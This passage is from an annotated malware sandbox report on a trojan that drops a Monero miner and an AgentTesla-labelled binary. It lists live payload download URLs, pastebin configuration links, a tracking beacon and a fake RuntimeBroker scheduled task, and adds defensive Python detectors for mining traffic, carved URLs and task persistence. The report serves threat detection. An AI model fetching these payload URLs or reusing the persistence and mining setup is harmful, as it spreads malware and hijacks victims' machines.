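SERVER_JOB = json.dumps({
    "id": 1, "jsonrpc": "2.0", "error": None,
    "result": {"id": "0123456789abcdef", "status": "OK",
               "job": {"blob": "0c0c" + "00" * 74, "job_id": "1", "target": "b88d0600", "algo": "cn/r"}},
}).encode() + b"\n"

# Constructed non-mining traffic, used as a negative control.
HTTP_REQUEST = b"GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n"
HTTP_REPLY = b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"

MINER_METHODS = {"login", "submit", "keepalived", "job"}   # client calls plus the pool's job push
WEB_PORTS = (80, 443)                                        # assumed "expected" ports


def stratum_messages(payload):
    """Yield JSON-RPC 2.0 objects from a newline-delimited TCP payload; skip anything else."""
    for line in payload.split(b"\n"):
        line = line.strip()
        if not line.startswith(b"{"):
            continue
        try:
            msg = json.loads(line)
        except ValueError:                 # JSONDecodeError is a ValueError
            continue
        if isinstance(msg, dict) and msg.get("jsonrpc") == "2.0":
            yield msg


def classify(msg):
    """Return (kind, details) for a mining message, or None for unrelated JSON-RPC."""
    method, params, result = msg.get("method"), msg.get("params"), msg.get("result")
    if method == "login" and isinstance(params, dict):
        return "login", {"wallet": params.get("login"), "agent": params.get("agent"),
                         "algos": params.get("algo", [])}
    if method in MINER_METHODS and isinstance(params, dict):
        return method, {k: params.get(k) for k in ("job_id", "nonce", "result", "target")}
    if isinstance(result, dict) and isinstance(result.get("job"), dict):
        job = result["job"]
        return "job", {"job_id": job.get("job_id"), "algo": job.get("algo"), "target": job.get("target")}
    return None


def assess_flow(dst_port, client_bytes, server_bytes):
    """Score one TCP flow. login + job confirms mining; a port outside WEB_PORTS is
    reported as context only, since Stratum pools also listen on 443."""
    seen = {}
    for data in (client_bytes, server_bytes):
        for msg in stratum_messages(data):
            hit = classify(msg)
            if hit:
                seen.setdefault(hit[0], hit[1])
    if not seen:
        return {"verdict": "no_stratum", "port": dst_port}
    verdict = "mining_confirmed" if {"login", "job"} <= set(seen) else "stratum_suspected"
    return {"verdict": verdict, "port": dst_port, "nonstandard_port": dst_port not in WEB_PORTS,
            "wallet": seen.get("login", {}).get("wallet"),
            "agent": seen.get("login", {}).get("agent"),
            "algo": seen.get("job", {}).get("algo")}


if __name__ == "__main__":
    print(assess_flow(4444, CLIENT_LOGIN, SERVER_JOB))
    print(assess_flow(443, HTTP_REQUEST, HTTP_REPLY))
```

              The same parser applied to a pcap of the 49731 -> 4444 session would recover the wallet without needing the command line, which matters when the miner is configured through a dropped config.json rather than arguments.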


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | 22% | Metadefender |
              SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | 29% | ReversingLabs |

              Dropped Files

              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Local\pg2bsuqa.exe | 100% | Joe Sandbox ML |
              C:\Users\user\AppData\Local\pg2bsuqa.exe | 24% | Metadefender |
              C:\Users\user\AppData\Local\pg2bsuqa.exe | 66% | ReversingLabs | Win32.Trojan.AgentTesla
              C:\Users\user\AppData\Local\zmql3v0y.exe | 61% | ReversingLabs | Win32.Packed.Themida
              C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys | 0% | Metadefender |
              C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys | 0% | ReversingLabs |
              C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe | 16% | Metadefender |
              C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe | 66% | ReversingLabs | Win64.Trojan.Miner
              C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | 61% | ReversingLabs | Win32.Packed.Themida

              The 0% on WinRing0x64.sys is expected: it is the generic WinRing0 hardware-access driver that XMRig ships for MSR access, so a driver of that name under a user profile is the indicator, not its scanner verdict.

              Unpacked PE Files

              Source | Detection | Scanner | Label
              4.0.pg2bsuqa.exe.ef0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
              4.1.pg2bsuqa.exe.ef0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

              Domains

              No Antivirus matches

              URLs

              Trailing characters such as 0#, 0, 0t, D8 or 4 on the URLs below are adjacent bytes captured together with the string in memory (for the certificate CRL/OCSP URLs, ASN.1 tag and length bytes), not part of the URL. Each URL Reputation row appeared three times in the original listing.

              Source | Detection | Scanner | Label
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | 0% | URL Reputation | safe
              https://sectigo.com/CPS0 | 0% | URL Reputation | safe
              http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
              http://195.2.84.91/cpu.zip | 0% | Avira URL Cloud | safe
              http://ocsp.thawte.com0 | 0% | URL Reputation | safe
              https://blog.agencia10x.com/dance.exe | 100% | Avira URL Cloud | malware
              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
              https://blog.agencia10x.com/dance.exed | 0% | Avira URL Cloud | safe
              https://pastebin.comD8 | 0% | Avira URL Cloud | safe
              http://195.2.84.91/amd.zip | 0% | Avira URL Cloud | safe
              http://ocsp.com | 0% | Avira URL Cloud | safe
              https://blog.agencia10x.com4 | 0% | Avira URL Cloud | safe
              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
              https://sectigo.com/CPS0D | 0% | URL Reputation | safe
              https://blog.agencia10x.com/mex.exe | 100% | Avira URL Cloud | malware
              https://pastebin.com4 | 0% | URL Reputation | safe
              http://195.2.84.91/nvidia.zip | 0% | Avira URL Cloud | safe
              https://blog.agencia10x.comD8 | 0% | Avira URL Cloud | safe

              The three archives on 195.2.84.91 (cpu.zip, amd.zip, nvidia.zip) match the miner payload naming seen in the dropped files (cpu.exe under a CPU directory); the "safe" verdicts there are reputation lookups on a fresh host, not an analysis of the content.

              Domains and IPs

              Contacted Domains

Name | IP | Active | Malicious | Reputation
ianawhois.vip.icann.org | 192.0.47.59 | true | false | high
blog.agencia10x.com | 172.67.213.210 | true | false | unknown
iplogger.org | 88.99.66.31 | true | false | high
WHOIS.RIPE.NET | 193.0.6.135 | true | false | high
pool.minexmr.com | 88.99.193.240 | true | false | high
pastebin.com | 104.23.99.190 | true | false | high
api.ip.sb | unknown | unknown | true | unknown
whois.iana.org | unknown | unknown | false | high

No row carries an antivirus detection. The Malicious and Reputation columns rate the hosting service, not this sample's use of it: pastebin.com serves the sample's configuration (the /raw/ URLs listed under URLs from Memory and Binaries), the iplogger.org links are a victim-tracking beacon, and pool.minexmr.com is the Monero mining pool the dropped miner connects to. whois.iana.org, ianawhois.vip.icann.org and WHOIS.RIPE.NET are public whois servers and api.ip.sb is an external-IP lookup service; none is attacker-controlled. Hunt on the full pastebin and iplogger URLs and on the pool hostname rather than on domain reputation.

                              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://195.2.84.91/cpu.zip | false | Avira URL Cloud: safe | unknown

                              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp | false | URL Reputation: safe ×3 | unknown
https://sectigo.com/CPS0 | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp | false | URL Reputation: safe ×3 | unknown
https://iplogger.org/1r2et7 | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278531237.00000000002E2000.00000020.00020000.sdmp, SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | false | - | high
http://ocsp.sectigo.com0 | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp, pg2bsuqa.exe.0.dr | false | URL Reputation: safe ×3 | unknown
http://ocsp.thawte.com0 | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | false | URL Reputation: safe ×3 | unknown
https://pastebin.com/raw/bnxCb5RPChttps://pastebin.com/raw/WmBNYXYN | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278531237.00000000002E2000.00000020.00020000.sdmp | false | - | high
https://blog.agencia10x.com/dance.exe | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://pastebin.com/raw/WmBNYXYN | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | false | - | high
https://iplogger.org | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | false | - | high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | pg2bsuqa.exe.0.dr | false | URL Reputation: safe ×3 | unknown
https://blog.agencia10x.com/dance.exed | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://pastebin.comD8 | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://195.2.84.91/amd.zip | zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | false | - | high
http://ocsp.com | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://blog.agencia10x.com4 | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | pg2bsuqa.exe.0.dr | false | URL Reputation: safe ×3 | unknown
https://sectigo.com/CPS0D | pg2bsuqa.exe.0.dr | false | URL Reputation: safe ×3 | unknown
https://blog.agencia10x.com/mex.exe | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://pastebin.com4 | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283839555.00000000032C8000.00000004.00000001.sdmp | false | URL Reputation: safe ×3 | unknown
https://pastebin.com/raw/bnxCb5RP | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | false | - | high
http://195.2.84.91/nvidia.zip | zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp | false | Avira URL Cloud: safe | unknown
https://iplogger.org/1tsef7 | zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp | false | - | high
https://blog.agencia10x.comD8 | SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
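Carved URL strings need normalizing before they are usable as indicators: the same URL appears several times with different memory tails, two pastes are run together into one string, and the certificate endpoints outnumber the hosts that matter. The script below is an added example of how I would triage the table above; it is not part of the Joe Sandbox report and not code from the sample. The CARVED list is constructed from entries in the table, and the three host buckets (certificate infrastructure, dual-use services, payload hosts) are my own classification of this report's hosts, not a Joe Sandbox field.

```python
"""Triage URL strings carved from process memory (added example).

Not part of the Joe Sandbox report and not code from the sample. CARVED is
constructed from the "URLs from Memory and Binaries" table; the host buckets
are my own analyst classification of this report's hosts.
"""
import re
from collections import OrderedDict

# Carved strings keep whatever bytes followed the URL in memory. Tails such
# as "0#", "0t", "0" and "0D" are ASN.1 tag/length bytes from the certificate
# chain; "D8", "4" and "d" are neighbouring heap data. None is part of the URL.
CARVED = [
    "http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#",
    "https://sectigo.com/CPS0",
    "https://sectigo.com/CPS0D",
    "http://ocsp.sectigo.com0",
    "http://ocsp.thawte.com0",
    "http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t",
    "https://pastebin.com/raw/bnxCb5RPChttps://pastebin.com/raw/WmBNYXYN",
    "https://pastebin.com/raw/bnxCb5RP",
    "https://pastebin.com4",
    "https://pastebin.comD8",
    "https://iplogger.org/1r2et7",
    "https://blog.agencia10x.com/dance.exe",
    "https://blog.agencia10x.com/dance.exed",
    "https://blog.agencia10x.comD8",
    "https://blog.agencia10x.com/mex.exe",
    "http://195.2.84.91/cpu.zip",
    "http://195.2.84.91/amd.zip",
    "http://ocsp.com",
]

# Certificate endpoints: every Authenticode-signed PE embeds these in its
# certificate chain, so they say nothing about what the sample does.
CERT_INFRA = {"crt.sectigo.com", "crl.sectigo.com", "ocsp.sectigo.com",
              "sectigo.com", "ocsp.thawte.com", "crl.thawte.com"}
# Legitimate services the sample abuses (paste-hosted config, victim
# tracking, external-IP lookup): good domain reputation, so act on the path.
DUAL_USE = {"pastebin.com", "iplogger.org", "api.ip.sb"}
# Hosts that served second-stage binaries and the cpu/amd/nvidia miner
# archives in this report (assumption: read off the Avira "malware" rows
# and the .zip downloads in the table).
PAYLOAD_HOSTS = {"blog.agencia10x.com", "195.2.84.91"}

# Host = dotted IPv4, or a lowercase DNS name ending in a TLD seen on this
# page; lazy matching stops before a glued-on tail such as "4" or "D8".
_HOST = re.compile(r"^https?://(\d{1,3}(?:\.\d{1,3}){3}"
                   r"|[a-z0-9-]+(?:\.[a-z0-9-]+)*?\.(?:com|org|net|vip|sb))")
# A path is trusted up to a known file extension; anything after it is tail.
_EXT = re.compile(r"^(.*?\.(?:crt|crl|exe|zip|dll))", re.I)


def split_concatenated(s):
    """Memory sometimes runs two URLs together; split at each scheme."""
    return [p for p in re.split(r"(?=https?://)", s) if p]


def normalize(s):
    """Return (host, path) with the tail removed, or None if not a URL."""
    m = _HOST.match(s)
    if not m:
        return None
    host, rest = m.group(1), s[m.end():]
    if not rest.startswith("/"):
        return host, ""            # tail glued straight onto the host
    path = rest.split("?", 1)[0]
    e = _EXT.match(path)
    return host, (e.group(1) if e else path)


def bucket(host):
    if host in CERT_INFRA:
        return "cert-infra"
    if host in DUAL_USE:
        return "dual-use"
    if host in PAYLOAD_HOSTS:
        return "payload"
    return "unclassified"


def triage(strings):
    """Map each normalized URL to its bucket, collapsing carved variants."""
    out = OrderedDict()
    for s in strings:
        for piece in split_concatenated(s):
            n = normalize(piece)
            if n:
                out.setdefault(n[0] + n[1], bucket(n[0]))
    return out


def indicators(strings):
    """Only the entries worth blocking or hunting for."""
    return [u for u, b in triage(strings).items() if b in ("payload", "dual-use")]


if __name__ == "__main__":
    for url, b in triage(CARVED).items():
        print(f"{b:12} {url}")
```

Paths without a known extension (sectigo.com/CPS0 and CPS0D, the pastebin paste with the glued "C") cannot be trimmed safely and stay as separate keys; the bucket, which depends only on the host, is still right for them.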

                                              Contacted IPs


                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.23.99.190 | unknown | United States | 13335 | CLOUDFLARENETUS | false
88.99.66.31 | unknown | Germany | 24940 | HETZNER-ASDE | false
195.2.84.91 | unknown | Russian Federation | 6903 | ZENON-ASMoscowRussiaRU | false
172.67.213.210 | unknown | United States | 13335 | CLOUDFLARENETUS | false
88.99.193.240 | unknown | Germany | 24940 | HETZNER-ASDE | false

                                              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356837
Start date: 23.02.2021
Start time: 17:36:27
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 3s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.7781 (renamed file extension from 7781 to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.mine.winEXE@13/9@9/5
EGA Information: Failed
HDC Information: Failed
HCA Information: Failed

Zero drivers were analysed even though the sample drops WinRing0x64.sys, so the driver load was not observed within this run; its behaviour has to be judged from the dropped file, not from this report.
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • TCP Packets have been reduced to 100
                                              • Excluded IPs from analysis (whitelisted): 104.42.151.234, 23.218.209.198, 40.88.32.150, 104.43.139.144, 23.211.6.115, 23.218.208.56, 51.104.139.180, 67.26.83.254, 67.26.75.254, 8.253.204.249, 67.26.73.254, 8.248.139.254, 51.103.5.159, 84.53.167.113, 104.26.13.31, 172.67.75.172, 104.26.12.31
                                              • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e15275.g.akamaiedge.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, wildcard.weather.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, client.wns.windows.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing network information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/356837/sample/SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe

                                              Simulations

                                              Behavior and APIs

Time | Type | Description
17:37:40 | API Interceptor | 1x Sleep call for process: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe modified
17:37:52 | Task Scheduler | Run new task: Windows Service Microsoft Corporation path: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
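The Task Scheduler entry is the persistence mechanism to hunt for on other hosts: a task named after a Microsoft service whose action is a RuntimeBroker.exe lookalike launched from the user's AppData\Roaming. The script below is an added example, not part of the report and not the sample's code. It parses the CSV from schtasks /query /v /fo CSV and scores every task on three signals (user-writable image path, Microsoft-style name with a non-Microsoft author and path, system-binary lookalike name). SAMPLE_CSV is constructed, keeps only the columns the script reads, and models its second task on the event above; the system-binary list and the edit-distance threshold are my own choices.

```python
"""Hunt scheduled-task persistence in a schtasks CSV export (added example).

Not part of the Joe Sandbox report and not code from the sample. Input is the
output of  schtasks /query /v /fo CSV  from a host under investigation.
SAMPLE_CSV is constructed: it keeps only the columns this script reads, and
its second task is modelled on the Task Scheduler event in the report.
"""
import csv
import io
import ntpath
import re

# Constructed export. Verbose schtasks output repeats the header line before
# each task on some Windows builds, so the parser drops such rows.
SAMPLE_CSV = r'''"HostName","TaskName","Author","Task To Run"
"DESKTOP-1","\Microsoft\Windows\Defrag\ScheduledDefrag","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$"
"HostName","TaskName","Author","Task To Run"
"DESKTOP-1","\Windows Service Microsoft Corporation","user","C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe"
"HostName","TaskName","Author","Task To Run"
"DESKTOP-1","\GoogleUpdateTaskMachineUA","Google Inc.","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler"
'''

# Directories any user can write to; a task claiming to be a Windows service
# has no business launching from one.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public|ProgramData)\\", re.I)
# Windows binaries that malware names itself after (assumption: my short list).
SYSTEM_BINARIES = ["runtimebroker.exe", "svchost.exe", "dllhost.exe",
                   "taskhostw.exe", "conhost.exe", "explorer.exe", "lsass.exe"]
# Executable at the front of "Task To Run", quoted or not, arguments dropped.
_IMAGE = re.compile(r'\s*"?(.*?\.(?:exe|cmd|bat|ps1|vbs|js|dll))"?', re.I)


def parse_export(text):
    """Yield one dict per task, dropping repeated header rows."""
    for row in csv.DictReader(io.StringIO(text)):
        if row.get("TaskName") != "TaskName":
            yield row


def _edit_distance(a, b):
    """Levenshtein distance; small enough to inline."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _image(action):
    m = _IMAGE.match(action)
    return m.group(1) if m else action.strip().split(" ", 1)[0]


def score_task(row):
    """Reasons a task looks like persistence; an empty list means clean."""
    reasons = []
    name, author = row["TaskName"], row.get("Author", "")
    image = _image(row["Task To Run"])
    exe = ntpath.basename(image).lower()
    if USER_WRITABLE.search(image):
        reasons.append("action runs from a user-writable directory")
    if (re.search(r"microsoft|windows", name, re.I)
            and "microsoft" not in author.lower()
            and not image.lower().startswith(("%windir%", "%systemroot%", "c:\\windows\\"))):
        reasons.append("Microsoft-style task name with non-Microsoft author and path")
    for known in SYSTEM_BINARIES:
        if exe != known and _edit_distance(exe, known) <= 2:
            reasons.append(f"{exe} is a lookalike of {known}")
            break
    return reasons


def hunt(text):
    """Suspicious tasks from a schtasks CSV export, each with its reasons."""
    hits = []
    for row in parse_export(text):
        reasons = score_task(row)
        if reasons:
            hits.append((row["TaskName"], reasons))
    return hits


if __name__ == "__main__":
    for task, why in hunt(SAMPLE_CSV):
        print(task)
        for r in why:
            print("  -", r)
```

On the constructed export only the RantimeBroker task fires, on all three signals; the Defrag and Google tasks are clean. The lookalike check is the one that survives a rename of the drop directory, so keep it even if you loosen the path rule for environments that legitimately run tasks from ProgramData.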

                                              Joe Sandbox View / Context

                                              IPs

Match | Associated Sample Name / URL | Detection | Context
104.23.99.190 | u6Wf8vCDUv.exe | malicious | pastebin.com/raw/BCAJ8TgJ
104.23.99.190 | Recept.exe | malicious | pastebin.com/raw/BCAJ8TgJ
104.23.99.190 | 7fYoHeaCBG.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | r0QRptqiCl.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | JDgYMW0LHW.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | kigAlmMyB1.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | 5T4Ykc0VSK.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | afvhKak0Ir.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | 1KITgJnGbI.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | DovV3LuJ6I.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | 66f8F6WvC1.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | PxwWcmbMC5.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | XnAJZR4NcN.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | uqXsQvWMnL.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | I8r7e1pqac.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | VrR9J0FnSG.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | dEpoPWHmoI.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | zZp3oXclum.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | aTZQZVVriQ.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | U23peRXm5Z.exe | malicious | pastebin.com/raw/XMKKNkb0

                                              Domains

Match | Associated Sample Name / URL | Detection | Context
ianawhois.vip.icann.org | 1vuet1S3tI.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | seed.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | SecuriteInfo.com.Trojan.GenericKDZ.73123.31244.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | 8WjU4jrBIr.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | 8TD8GfTtaW.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | kmU6NKmBPV.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | AHfG1a8jFs.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | ydQ0ICWj5v.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | r4yGYPyWb7.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | aif9fEvN5g.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | ProtonVPN.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | bZ9avvcHvE.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | CmJ6qDTzvM.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | RRLrVfeAXb.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | m3eJIFyc68.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | 7E6gDkEV97.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | Dmjsru7tdt.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | 5FKzdCQAY0.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | mq28SXD6jb.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | w4XSMSClXm.exe | malicious | 192.0.47.59
iplogger.org | SecuriteInfo.com.Trojan.Siggen12.2497.1023.exe | malicious | 88.99.66.31
iplogger.org | 1vuet1S3tI.exe | malicious | 88.99.66.31
iplogger.org | seed.exe | malicious | 88.99.66.31
iplogger.org | SecuriteInfo.com.Variant.Zusy.368685.25375.exe | malicious | 88.99.66.31
iplogger.org | SecuriteInfo.com.Trojan.GenericKDZ.73124.19170.exe | malicious | 88.99.66.31
iplogger.org | SecuriteInfo.com.Trojan.GenericKDZ.73123.31244.exe | malicious | 88.99.66.31
iplogger.org | SecuriteInfo.com.Variant.Zusy.368685.25618.exe | malicious | 88.99.66.31
iplogger.org | 8WjU4jrBIr.exe | malicious | 88.99.66.31
iplogger.org | 8TD8GfTtaW.exe | malicious | 88.99.66.31
iplogger.org | ydQ0ICWj5v.exe | malicious | 88.99.66.31
iplogger.org | r4yGYPyWb7.exe | malicious | 88.99.66.31
iplogger.org | aif9fEvN5g.exe | malicious | 88.99.66.31
iplogger.org | bZ9avvcHvE.exe | malicious | 88.99.66.31
iplogger.org | CmJ6qDTzvM.exe | malicious | 88.99.66.31
iplogger.org | RRLrVfeAXb.exe | malicious | 88.99.66.31
iplogger.org | m3eJIFyc68.exe | malicious | 88.99.66.31
iplogger.org | m8kdtboA0T.exe | malicious | 88.99.66.31
iplogger.org | jdAbDsECEE.exe | malicious | 88.99.66.31
iplogger.org | m8kdtboA0T.exe | malicious | 88.99.66.31
iplogger.org | IVCkMokXk8.exe | malicious | 88.99.66.31
blog.agencia10x.com | 1vuet1S3tI.exe | malicious | 104.21.67.51
blog.agencia10x.com | SecuriteInfo.com.Trojan.GenericKDZ.73123.31244.exe | malicious | 172.67.213.210
blog.agencia10x.com | 8WjU4jrBIr.exe | malicious | 172.67.213.210
blog.agencia10x.com | 8TD8GfTtaW.exe | malicious | 104.21.67.51

                                              ASN

Match | Associated Sample Name / URL | Detection | Context
ZENON-ASMoscowRussiaRU | 1vuet1S3tI.exe | malicious | 195.2.84.91
ZENON-ASMoscowRussiaRU | SecuriteInfo.com.Variant.Zusy.368685.25375.exe | malicious | 195.2.84.91
ZENON-ASMoscowRussiaRU | SecuriteInfo.com.Variant.Zusy.368685.25618.exe | malicious | 195.2.84.91
ZENON-ASMoscowRussiaRU | 8WjU4jrBIr.exe | malicious | 195.2.84.91
